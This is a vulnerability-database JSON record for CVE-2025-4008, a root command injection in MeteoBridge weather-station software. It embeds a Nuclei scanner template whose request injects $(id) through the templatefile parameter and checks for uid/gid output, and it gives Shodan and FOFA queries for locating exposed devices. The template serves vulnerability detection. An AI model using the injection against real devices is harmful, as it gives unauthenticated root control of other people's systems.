{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-4008/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-4008/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-4008/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-4008/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-4008/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-4008"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-4008"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2025/CVE-2025-4008.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2025-4008\n\ninfo:\n  name: MeteoBridge <= 6.1 - Remote Code Execution\n  author: iamnoooob,pdresearch\n  severity: high\n  description: |\n    The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.\n  impact: |\n    Unauthenticated attackers can execute arbitrary operating system commands with root privileges through the templatefile parameter, achieving complete device compromise.\n  remediation: |\n    Upgrade MeteoBridge to version 6.2 or later that properly sanitizes input in template.cgi.\n  reference:\n    - https://forum.meteohub.de/viewtopic.php?t=18687\n    - https://www.onekey.com/resource/security-advisory-remote-command-execution-on-smartbedded-meteobridge-cve-2025-4008\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-4008\n  classification:\n    cve-id: CVE-2025-4008\n    cvss-score: 7.5\n    cwe-id: CWE-77\n    epss-score: 0.93667\n    epss-percentile: 0.99839\n  metadata:\n    verified: true\n    shodan-query: \"meteobridge\"\n    fofa-query: \"Meteobridge\"\n  tags: cve,cve2025,meteobridge,rce,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /public/template.cgi?templatefile=$(id) HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'Error: template file'\n          - 'uid='\n          - 'gid='\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100eeb1ee9f5bfc20c52f39744e3ca282acaca0065e27f3e42995ff72adc1d4128a022100ff975a99544a1162bb26a5c3143d59982ac4de4e55b67cb969b6fa41fb1d9a10:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2025-4008"
}